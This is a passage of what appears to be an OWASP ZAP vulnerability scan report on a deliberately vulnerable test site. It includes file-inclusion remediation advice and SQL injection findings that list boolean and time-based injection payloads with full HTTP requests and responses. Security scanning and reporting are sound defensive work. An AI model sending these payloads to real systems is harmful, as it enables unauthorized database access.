try{ _.ie=function(a,b,c){if(!a.o)if(c instanceof Array){c=_.Ua(c);for(var d=c.next();!d.done;d=c.next())_.ie(a,b,d.value)}else{d=(0,_.y)(a.F,a,b);var e=a.B+c;a.B++;b.setAttribute("data-eqid",e);a.D[e]=d;b&&b.addEventListener?b.addEventListener(c,d,!1):b&&b.attachEvent?b.attachEvent("on"+c,d):a.A.log(Error("B`"+b))}}; }catch(e){_._DumpException(e)} try{ /* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ _.je=function(){if(!_.n.addEventListener||!Object.defineProperty)return!1;var a=!1,b=Object.defineProperty({},"passive",{get:function(){a=!0}});try{_.n.addEventListener("test",_.gb,b),_.n.removeEventListener("test",_.gb,b)}catch(c){}return a}(); _.ke=_.Gb?"webkitTransitionEnd":"transitionend"; }catch(e){_._DumpException(e)} try{ var le=document.querySelector(".gb_z .gb_A"),me=document.querySelector("#gb.gb_Hc");le&&!me&&_.ie(_.$d,le,"click"); }catch(e){_._DumpException(e)} try{ var Qh=function(a){_.H.call(this);this.C=a;this.A=null;this.o={};this.D={};this.j={};this.B=null};_.w(Qh,_.H);_.Rh=function(a){if(a.A)return a.A;for(var b in a.j)if(a.j[b].He()&&a.j[b].Fb())return a.j[b];return null};_.h=Qh.prototype;_.h.Ze=function(a){a&&_.Rh(this)&&a!=_.Rh(this)&&_.Rh(this).Cd(!1);this.A=a};_.h.$f=function(a){a=this.j[a]||a;return _.Rh(this)==a};_.h.re=function(a,b){b=b.Bc();if(this.o[a]&&this.o[a][b])for(var c=0;c<this.o[a][b].length;c++)try{this.o[a][b][c]()}catch(d){this.C.log(d)}}; _.h.nh=function(a){return!this.D[a.Bc()]};_.h.yg=function(a){this.j[a]&&(_.Rh(this)&&_.Rh(this).Bc()==a||this.j[a].Cd(!0))};_.h.Ta=function(a){this.B=a;for(var b in this.j)this.j[b].He()&&this.j[b].Ta(a)};_.h.Ve=function(a){this.j[a.Bc()]=a};_.h.je=function(a){return a in this.j?this.j[a]:null};var Sh=new Qh(_.J);_.Ad("dd",Sh); }catch(e){_._DumpException(e)} try{ var sj=document.querySelector(".gb_La .gb_A"),tj=document.querySelector("#gb.gb_Hc");sj&&!tj&&_.ie(_.$d,sj,"click"); }catch(e){_._DumpException(e)} })(this.gbar_); // Google Inc. this.gbar_=this.gbar_||{};(function(_){var window=this; try{ /* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ _.ne=function(a,b){return 0<=(0,_.ub)(a,b)};_.oe=function(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var d=c.slice();d.push.apply(d,arguments);return a.apply(this,d)}};try{(new self.OffscreenCanvas(0,0)).getContext("2d")}catch(a){}_.pe=_.C||_.Gb; _.qe=function(a,b){this.width=a;this.height=b};_.h=_.qe.prototype;_.h.clone=function(){return new _.qe(this.width,this.height)};_.h.aspectRatio=function(){return this.width/this.height};_.h.Vb=function(){return!(this.width*this.height)};_.h.ceil=function(){this.width=Math.ceil(this.width);this.height=Math.ceil(this.height);return this};_.h.floor=function(){this.width=Math.floor(this.width);this.height=Math.floor(this.height);return this}; _.h.round=function(){this.width=Math.round(this.width);this.height=Math.round(this.height);return this}; var se,ve;_.re=function(a,b){return(b||document).getElementsByTagName(String(a))};_.te=function(a,b){_.Ka(b,function(c,d){c&&"object"==typeof c&&c.Nb&&(c=c.nb());"style"==d?a.style.cssText=c:"class"==d?a.className=c:"for"==d?a.htmlFor=c:se.hasOwnProperty(d)?a.setAttribute(se[d],c):0==d.lastIndexOf("aria-",0)||0==d.lastIndexOf("data-",0)?a.setAttribute(d,c):a[d]=c})}; se={cellpadding:"cellPadding",cellspacing:"cellSpacing",colspan:"colSpan",frameborder:"frameBorder",height:"height",maxlength:"maxLength",nonce:"nonce",role:"role",rowspan:"rowSpan",type:"type",usemap:"useMap",valign:"vAlign",width:"width"};_.we=function(a,b){var c=b[1],d=_.ue(a,String(b[0]));c&&("string"===typeof c?d.className=c:Array.isArray(c)?d.className=c.join(" "):_.te(d,c));2<b.length&&ve(a,d,b);return d}; ve=function(a,b,c){function d(k){k&&b.appendChild("string"===typeof k?a.createTextNode(k):k)}for(var e=2;e<c.length;e++){var f=c[e];if(!_.ib(f)||_.jb(f)&&0<f.nodeType)d(f);else{a:{if(f&&"number"==typeof f.length){if(_.jb(f)){var g="function"==typeof f.item||"string"==typeof f.item;break a}if("function"===typeof f){g="function"==typeof f.item;break a}}g=!1}_.vb(g?_.la(f):f,d)}}};_.xe=function(a){return _.ue(document,a)}; _.ue=function(a,b){b=String(b);"application/xhtml+xml"===a.contentType&&(b=b.toLowerCase());return a.createElement(b)};_.ye=function(a){for(var b;b=a.firstChild;)a.removeChild(b)};_.ze=function(a){return _.jb(a)&&1==a.nodeType};_.Ae=function(a){return 9==a.nodeType?a:a.ownerDocument||a.document};_.Be=function(a,b,c){for(var d=0;a&&(null==c||d<=c);){if(b(a))return a;a=a.parentNode;d++}return null}; }catch(e){_._DumpException(e)} try{ _.xj=function(a){_.G.call(this,a)};_.w(_.xj,_.G); }catch(e){_._DumpException(e)} try{ _.yj=function(a,b,c){a.rel=c;-1!=c.toLowerCase().indexOf("stylesheet")?(a.href=_.Rc(b),(b=_.pd(a.ownerDocument&&a.ownerDocument.defaultView))&&a.setAttribute("nonce",b)):a.href=b instanceof _.Pc?_.Rc(b):b instanceof _.Uc?_.Vc(b):_.Vc(_.$c(b))}; }catch(e){_._DumpException(e)} try{ _.Aj=function(a){if("function"==typeof _.zj&&a instanceof _.zj)return a.j;throw Error("G");};_.Cj=function(a){return"function"==typeof _.Bj&&a instanceof _.Bj?_.Aj(a):_.Qc(a)};_.Dj=function(a){var b,c=(a.ownerDocument&&a.ownerDocument.defaultView||window).document,d=null===(b=c.querySelector)||void 0===b?void 0:b.call(c,"script[nonce]");(b=d?d.nonce||d.getAttribute("nonce")||"":"")&&a.setAttribute("nonce",b)}; /* SPDX-License-Identifier: Apache-2.0 */ }catch(e){_._DumpException(e)} try{ var Ej=function(a,b,c){_.Zd.log(46,{att:a,max:b,url:c})},Gj=function(a,b,c){_.Zd.log(47,{att:a,max:b,url:c});a<b?Fj(a+1,b):_.J.log(Error("fa`"+a+"`"+b),{url:c})},Fj=function(a,b){if(Hj){var c=_.xe("SCRIPT");c.async=!0;c.type="text/javascript";c.charset="UTF-8";c.src=_.Cj(Hj);_.Dj(c);c.onload=_.oe(Ej,a,b,c.src);c.onerror=_.oe(Gj,a,b,c.src);_.Zd.log(45,{att:a,max:b,url:c.src});_.re("HEAD")[0].appendChild(c)}},Ij=function(a){_.G.call(this,a)};_.w(Ij,_.G); var Jj=_.r(_.Vd,Ij,17)||new Ij,Kj,Hj=(Kj=_.r(Jj,_.xj,1))?_.Sc(_.D(Kj,4)||""):null,Lj,Mj=(Lj=_.r(Jj,_.xj,2))?_.Sc(_.D(Lj,4)||""):null,Nj=function(){Fj(1,2);if(Mj){var a=_.xe("LINK");a.setAttribute("type","text/css");_.yj(a,Mj,"stylesheet");var b=_.pd(void 0);b&&a.setAttribute("nonce",b);_.re("HEAD")[0].appendChild(a)}}; (function(){var a=_.Wd();if(_.F(a,18))Nj();else{var b=_.D(a,19)||0;window.addEventListener("load",function(){window.setTimeout(Nj,b)})}})(); }catch(e){_._DumpException(e)} })(this.gbar_); // Google Inc. </script><div><div><div class="gb_Fd">Google apps</div></div></div></div><textarea class="csi" name="csi" style="display:none"></textarea><script nonce="5ySziL3YJHRCAmDtf1BIGA==">(function(){ (function(){var c=Date.now();if(google.timers&&google.timers.load.t){for(var a=document.getElementsByTagName("img"),d=0,b=void 0;b=a[d++];)google.c.setup(b,!1,void 0);google.c.frt=!1;google.c.e("load","imn",String(a.length));google.c.ubr(!0,c);google.c.glu&&google.c.glu();google.rll(window,!1,function(){google.tick("load","ol");google.c.u("pr")})}})();}).call(this);(function(){google.jl={attn:false,blt:'none',chnk:0,dw:false,dwu:true,emtn:0,end:0,ine:false,injs:'none',injt:0,lls:'default',pdt:0,rep:0,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22aa\x22:{},\x22abd\x22:{\x22abd\x22:false,\x22deb\x22:false,\x22det\x22:false},\x22async\x22:{},\x22cdos\x22:{\x22cdobsel\x22:false},\x22cr\x22:{\x22qir\x22:false,\x22rctj\x22:true,\x22ref\x22:false,\x22uff\x22:false},\x22csi\x22:{},\x22d\x22:{},\x22dpf\x22:{},\x22dvl\x22:{\x22cookie_secure\x22:true,\x22cookie_timeout\x22:21600,\x22jsc\x22:\x22[null,null,null,30000,null,null,null,2,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,[\\\x2286400000\\\x22,\\\x22604800000\\\x22,2],null,null,21600000,null,null,1,null,null,null,null,null,1]\x22,\x22msg_err\x22:\x22Location unavailable\x22,\x22msg_gps\x22:\x22Using GPS\x22,\x22msg_unk\x22:\x22Unknown\x22,\x22msg_upd\x22:\x22Update location\x22,\x22msg_use\x22:\x22Use precise location\x22,\x22use_local_storage_fallback\x22:false},\x22gf\x22:{\x22pid\x22:196},\x22hsm\x22:{},\x22jsa\x22:{\x22csi\x22:true,\x22csir\x22:100},\x22mu\x22:{\x22murl\x22:\x22https://adservice.google.com/adsid/google/ui\x22},\x22pHXghd\x22:{},\x22sb_wiz\x22:{\x22rfs\x22:[],\x22scq\x22:\x22\x22,\x22stok\x22:\x22M2lgoIxx5lEFTT_xzx-TWkv8hGA\x22},\x22sf\x22:{}}';google.pmc=JSON.parse(pmc);})();(function(){var r=['sb_wiz','aa','abd','async','dvl','mu','pHXghd','sf'];google.plm(r);})();(function(){var m=['CcBzaE','[\x22gws-wiz\x22,\x22\x22,\x22\x22,\x22\x22,null,1,0,0,11,\x22en\x22,\x22M2lgoIxx5lEFTT_xzx-TWkv8hGA\x22,\x22\x22,\x22uPQuYr-_B-yD1e8PwcG16Ag\x22,0,\x22en-IN\x22,null,null,null,3,5,null,-1,null,\x22\x22,-1,0,0,null,1,0,null,0,0,1800000,1,0,0,8,6,null,0,null,null,1,0,0,0,0,0.1,null,0,100,0,null,1.15,0,null,null,null,1,null,0,null,0,6,0,null,null,null,null,null,0,1,1,0,null,null,0,null,null,null,null,0,null,null,null,null,null,null,null,0,null,1,1,0,null,\x22\x22,0,1,0,-1,null,1,null,0,0,0,1028,10,10]']; var a=m;window.W_jd=window.W_jd||{};for(var b=0;b<a.length;b+=2)window.W_jd[a[b]]=JSON.parse(a[b+1]);})();(function(){window.WIZ_global_data={"GWsdKe":"en-IN","eptZe":"/wizrpcui/_/WizRpcUi/","Im6cmf":"/wizrpcui/_/WizRpcUi","QrtxK":"0","S06Grb":"","zChJod":"%.@.]","LVIXXb":"1","w2btAe":"%.@.\"\",\"\",\"0\",null,null,null,1]","Yllh3e":"%.@.1647244472122815,133513708,2366464193]","SNlM0e":""};window.IJ_values=[false,false,true,true,true,false,false,false,"#4285f4","#f8f9fa","#1a73e8",36,24,28,6,"none",true,"0 1px 6px rgba(32,33,36,0.28)",false,"#fff","#fff","#dadce0","#3c4043","0 1px 2px rgba(60,64,67,.3), 0 2px 6px 2px rgba(60,64,67,.15)","#9aa0a6","#f1f3f4","#bdc1c6","#e8eaed","#dadce0","#9aa0a6","#f8f9fa","#202124","#e8f0fe","#d2e3fc","#d2e3fc","0 1px 2px rgba(66,133,244,.3), 0 1px 3px 1px rgba(66,133,244,.15)","#aecbfa","#8ab4f8","#d2e3fc","#174ea6","#1967d2","rgba(0,0,0,.54)","rgba(0,0,0,.26)","#fff","rgba(255,255,255,.30)",false,false,"invert(1) hue-rotate(180deg)","#b8bbbe",false,false,true,"0 1px 6px rgba(32,33,36,0.28)",6,true,true,false,false,false,false,false,false,"#3c4043",10,false,true,false,"#aecbfa","#1a73e8",false,false,"#f5f5f5","rgba(0,0,0,.87)",false,"#fff","0px 5px 26px 0px rgba(0, 0, 0, 0.22), 0px 20px 28px 0px rgba(0, 0, 0, 0.30)","#4285f4",false,true,false,"#4285f4",false,true,false,false,"#000","#4285f4","#4285f4","#4285f4","#e8f0fe","#1a73e8","#1558d6","#34a853","#1e8e3e","#188038","#ea4335","#d93025","#d93025","#fff","#81c995","#34a853","#dadce0","#dadce0","#dadce0","#f8f9fa","#f8f9fa","#f8f9fa","#f8f9fa","#f8f9fa","#70757a","#70757a","#70757a","#70757a","#3c4043","#202124","#202124","#fff","#fbbc04","#fbbc04","#f29900","#f1f3f4","#202124","#202124","#f1f3f4",14,"#202124",40,"#202124",false,"#70757a","#202124","#ea4335","#000","arial,sans-serif-medium,sans-serif","arial,sans-serif","#000","#dadce0","#000","#70757a","#1a73e8",false,false,false,false,false,false,true,false,false,false,"0 2px 10px 0 rgba(0,0,0,0.2)",false,false,"rgba(0,0,0,.12)","rgba(0,0,0,.26)","#70757a","#202124","rgba(204,204,204,.15)","rgba(204,204,204,.25)","rgba(112,117,122,.20)","rgba(112,117,122,.40)","rgba(0,0,0,.12)","#323232","#fff","rgba(255,255,255,.30)","#fff","#202124","#fff","Roboto,RobotoDraft,Helvetica,Arial,sans-serif","14px","500","500","pointer","0 1px 1px rgba(0,0,0,.16)","0 2px 2px 0 rgba(0,0,0,.14),0 3px 1px -2px rgba(0,0,0,.2),0 1px 5px 0 rgba(0,0,0,.12)",true,"#000","0 4px 16px rgba(0,0,0,0.2)","#666",200,false,true,false,true,true,false,true,true,false,true,14,"#fff","#fff",false,"#000","1px solid #dadce0","none","arial,sans-serif-medium,sans-serif","Google Sans,arial,sans-serif-medium,sans-serif","arial,sans-serif","#ebebeb","1px solid #dadce0","1px solid #dadce0","#202124","0 2px 10px 0 rgba(0,0,0,0.2)","rgba(0,0,0,0.1)","#dadce0","#fff","#1a0dab","#ebebeb","#202124","#70757a",false,true,true,false,false,false,false,false,false,false,false,false,"#1a73e8","#8ab4f8","#1c3aa9","#0f9d58","#87ceac","#9e9e9e","rgba(0,0,0,.26)","#bdbdbd","#000","#5f6368","#dadce0",false,true,false,false,false,true,false,false,false,false,false,false,false,"8px","#ebebeb",false,true,false,"%.@.\"\",\"\",\"0\",null,null,null,1]","0","%.@.null,1,1,null,[null,757,1440]]","5ySziL3YJHRCAmDtf1BIGA\u003d\u003d","%.@.\"#b8bbbe\"]","%.@.0]","%.@.0]","%.@.\"0px 5px 26px 0px rgba(0,0,0,0.22),0px 20px 28px 0px rgba(0,0,0,0.3)\",\"#fff\"]","%.@.null,null,null,null,null,null,null,null,null,null,null,null,null,null,\"#202124\",\"#70757a\",null,\"#202124\"]",null,"%.@.[],0,null,0,0]","en-IN","%.@.\"13px\",\"16px\",\"11px\",13,16,11,\"8px\",8,20]","en_IN","%.@.\"10px\",10,\"16px\",16,\"18px\"]","%.@.\"14px\",14]","%.@.40,32,14]",null,"%.@.\"0 2px 10px 0 rgba(0,0,0,0.2)\"]","%.@.0,\"14px\",\"500\",\"500\",\"0 1px 1px rgba(0,0,0,.16)\",\"pointer\",\"#000\",\"rgba(0,0,0,.26)\",\"#70757a\",\"#202124\",\"rgba(204,204,204,.15)\",\"rgba(204,204,204,.25)\",\"rgba(112,117,122,.20)\",\"rgba(112,117,122,.40)\",\"#34a853\",\"#4285f4\",\"#1558d6\",\"#ea4335\",\"#fbbc04\",\"#f8f9fa\",\"#f8f9fa\",\"#202124\",\"#34a853\",\"rgba(0,0,0,.12)\",null,\"#fff\",\"rgba(255,255,255,.30)\",\"#fff\",\"#202124\",\"#fff\",null,0]","%.@.\"20px\",\"500\",\"400\",\"13px\",\"15px\",\"15px\",\"Roboto,RobotoDraft,Helvetica,Arial,sans-serif\",\"24px\",\"400\",\"32px\",\"24px\"]",false,"","%.@.null,null,null,null,\"20px\",\"20px\",\"18px\",\"40px\",\"36px\",\"32px\",null,null,null,null,null,null,\"#fff\",null,null,null,\"#fff\",null,null,null,\"#e8f0fe\",null,\"#e8f0fe\",null,null,\"16px\",\"12px\",\"8px\",\"4px\",\"#fff\",\"#e8f0fe\",\"#1967d2\",\"transparent\",\"#1a0dab\",\"#dadce0\",\"999rem\",\"8px\",\"#1967d2\",\"transparent\",\"#3c4043\",\"#dadce0\",\"#1967d2\",\"transparent\",\"#1a73e8\",\"#dadce0\",\"999rem\",\"Google Sans,arial,sans-serif-medium,sans-serif\",\"20px\",\"14px\",\"500\",\"#f1f3f4\",\"#202124\",\"#fff\",\"#dadce0\",\"#3c4043\",\"4px\"]","%.@.\"#202124\",\"#3c4043\",\"#1a73e8\",null,\"#70757a\",\"#1a0dab\",\"#609\",null,null,\"#fff\",\"#1a73e8\",\"#fff\",\"#e8f0fe\",\"#1558d6\",\"#f1f3f4\",\"#202124\",\"#fff\",\"#3c4043\",\"#202124\",\"#fff\",\"#fff\",\"#fff\",\"#188038\",\"#d93025\",\"#e37400\",\"#dadce0\",\"#fff\",\"rgba(32,33,36,0.6)\",\"#202124\",\"#ebebeb\",\"#d2e3fc\",\"rgba(0,0,0,0.03)\",\"#1a73e8\",\"#70757a\"]","%.@.null,\"none\",null,\"0px 1px 3px rgba(60,64,67,0.08)\",null,\"0px 2px 6px rgba(60,64,67,0.16)\",null,\"0px 4px 12px rgba(60,64,67,0.24)\",null,null,\"1px solid #dadce0\",\"none\",\"none\",\"none\"]","%.@.\"Google Sans,arial,sans-serif\",\"Google Sans,arial,sans-serif-medium,sans-serif\",\"arial,sans-serif\",\"arial,sans-serif-medium,sans-serif\",\"arial,sans-serif-light,sans-serif\"]","%.@.\"16px\",\"12px\",\"0px\",\"8px\",\"4px\",\"2px\",\"20px\",\"24px\"]","%.@.\"#1a0dab\",\"#1a0dab\"]","%.@.null,null,null,null,null,null,null,\"12px\",\"8px\",\"4px\",\"16px\",\"2px\",\"999rem\",\"0px\"]","%.@.\"700\",\"400\",\"underline\",\"none\",\"capitalize\",\"none\",\"uppercase\",\"none\",\"500\",\"lowercase\",\"italic\",\"-1px\",\"0.3px\"]","%.@.\"20px\",\"26px\",\"400\",\"Google Sans,arial,sans-serif\",null,\"arial,sans-serif\",\"14px\",\"400\",\"22px\",null,\"16px\",\"24px\",\"400\",\"Google Sans,arial,sans-serif\",null,\"Google Sans,arial,sans-serif\",\"60px\",\"48px\",\"-1px\",null,\"400\",\"Google Sans,arial,sans-serif\",\"36px\",\"400\",\"48px\",null,\"Google Sans,arial,sans-serif\",\"36px\",\"28px\",null,\"400\",null,\"arial,sans-serif\",\"24px\",\"18px\",null,\"400\",\"arial,sans-serif\",\"16px\",\"12px\",null,\"400\",\"arial,sans-serif\",\"22px\",\"16px\",null,\"400\",\"arial,sans-serif\",\"26px\",\"20px\",null,\"400\",\"Google Sans,arial,sans-serif\",\"20px\",\"16px\",null,\"400\",\"arial,sans-serif\",\"18px\",\"14px\",null,\"400\",\"Google Sans,arial,sans-serif\",\"32px\",\"24px\",null,\"500\",\"14px\",\"Google Sans,arial,sans-serif-medium,sans-serif\",\"20px\",\"500\"]","%.@.\"hsla(0,0%,100%,0)\"]","%.@.4]","%.@.\"14px\",14,\"16px\",16,\"0\",0,\"none\",632,\"1px solid #dadce0\",\"normal\",\"normal\",\"#70757a\",\"12px\",\"1.34\",\"1px solid #dadce0\",\"none\",\"0\",\"none\",\"none\",\"none\",\"none\",\"6px\",\"632px\"]","%.@.\"0\"]","%.@.\"rgba(0,0,0,0.0)\",\"rgba(0,0,0,0.54)\",\"rgba(0,0,0,0.8)\",\"rgba(248, 249, 250, 0.85)\",\"#202124\",\"#dadce0\",\"rgba(218, 220, 224, 0.0)\",\"rgba(218, 220, 224, 0.7)\",\"#dadce0\",\"#f8f9fa\",\"#000\",\"#1a73e8\",\"#dadce0\",\"#fff\",\"#fff\",null,\"#70757a\",\"rgba(0,0,0,0.26)\",\"rgba(0,0,0,0.2)\",\"rgba(0,0,0,0.5)\",\"rgba(0,0,0,0.2)\",\"#fff\",\"rgba(0,0,0,0.1)\",\"#fff\",\"#70757a\",null,\"#000\",\"#fff\",\"#000\"]","%.@.\"#202124\",\"#70757a\",\"#4d5156\",\"#5f6368\",\"#fff\",\"rgba(255,255,255,.70)\",28,24,26,20,16,-2,0,-4,2,0,0,24,20,20,14,12]","%.@.\"20px\",20,\"14px\",14,\"\\\"rgba(0, 0, 0, .87)\\\"\"]","",false,"105250506097979753968","%.@.1]"];})();(function(){google.llio=true;google.llirm='400px';google.ldi={};google.pim={};})(); window.jsl=window.jsl||{};window.jsl.dh=function(a,b,f){try{var g=document.getElementById(a);if(g)g.innerHTML=b,f&&f();else{var c={id:a,script:String(!!f),milestone:String(google.jslm||0)};google.jsla&&(c.async=google.jsla);var h=a.indexOf("_"),d=0<h?a.substring(0,h):"",k=document.createElement("div");k.innerHTML=b;var e=k.children[0];if(e&&(c.tag=e.tagName,c["class"]=String(e.className||null),c.name=String(e.getAttribute("jsname")),d)){a=[];var l=document.querySelectorAll('[id^="'+d+'_"]');for(b=0;b<l.length;++b)a.push(l[b].id);c.ids=a.join(",")}google.ml(Error(d?"Missing ID with prefix "+d:"Missing ID"),!1,c)}}catch(m){google.ml(m,!0,{"jsl.dh":!0})}};(function(){var x=true; google.jslm=x?2:1;})();google.x(null, function(){(function(){(function(){google.csct={};google.csct.ps='AOvVaw1Qa_Hg3OC_TzD5rZ-Xzl6V\x26ust\x3d1647330872156026';})();})();(function(){(function(){google.csct.rw=true;})();})();(function(){(function(){google.csct.rl=true;})();})();(function(){google.drty&&google.drty(undefined,true);})();});google.drty&&google.drty(undefined,true);</script></body></html> |
| Instances | 2 |
| Solution |
Phase: Architecture and Design
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability.
Phases: Architecture and Design; Operation
Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.
OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.
This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
Be careful to avoid CWE-243 and other weaknesses related to jails.
For PHP, the interpreter offers restrictions such as open basedir or safe mode which can make it more difficult for an attacker to escape out of the application. Also consider Suhosin, a hardened PHP extension, which includes various options that disable some of the more dangerous PHP features.
Phase: Implementation
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
For filenames, use stringent allow lists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use an allow list of allowable file extensions, which will help to avoid CWE-434.
Phases: Architecture and Design; Operation
Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.
This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce your attack surface.
Phases: Architecture and Design; Implementation
Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components.
|
| Reference |
http://projects.webappsec.org/Remote-File-Inclusion
http://cwe.mitre.org/data/definitions/98.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 WSTG-v42-INPV-11 |
| CWE Id | 98 |
| WASC Id | 5 |
| Plugin Id | 7 |
|
High |
SQL Injection |
|---|---|
| Description |
SQL injection may be possible.
|
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | tfUName |
| Attack | ZAP' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 441 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 52 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 52 bytes. |
tfUName=ZAP%27+AND+%271%27%3D%271%27+--+&tfUPass=ZAP
|
| Response Header - size: 211 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Default.asp? Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:56:33 GMT Content-Length: 134 |
| Response Body - size: 134 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Default.asp?">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | tfUPass |
| Attack | ZAP' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 441 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 52 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 52 bytes. |
tfUName=ZAP&tfUPass=ZAP%27+AND+%271%27%3D%271%27+--+
|
| Response Header - size: 211 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Default.asp? Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:56:37 GMT Content-Length: 134 |
| Response Body - size: 134 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Default.asp?">here</a>.</body> |
| Instances | 2 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the principle of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
WSTG-v42-INPV-05 OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 40018 |
|
High |
SQL Injection - MsSQL |
|---|---|
| Description |
SQL injection may be possible
|
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
| Method | GET |
| Parameter | tfSearch |
| Attack | ZAP) WAITFOR DELAY '0:0:15' -- |
| Evidence | |
| Request Header - size: 389 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP%29+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 14 bytes. |
HTTP/1.0 0
|
| Response Body - size: 0 bytes. |
|
| URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
| Method | GET |
| Parameter | id |
| Attack | 2" WAITFOR DELAY '0:0:15' -- |
| Evidence | |
| Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2%22+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 14 bytes. |
HTTP/1.0 0
|
| Response Body - size: 0 bytes. |
|
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | id |
| Attack | 40 WAITFOR DELAY '0:0:15' -- |
